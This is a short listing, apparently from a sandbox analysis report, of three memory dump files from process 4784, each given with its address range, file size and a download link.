memory/4784-86-0x0000000005640000-0x0000000005652000-memory.dmp

Filesize
72KB

Download
memory/4784-88-0x0000000005600000-0x0000000005606000-memory.dmp

Filesize
24KB

Download
memory/4784-87-0x0000000007DE0000-0x0000000007E7C000-memory.dmp

Filesize
624KB

Download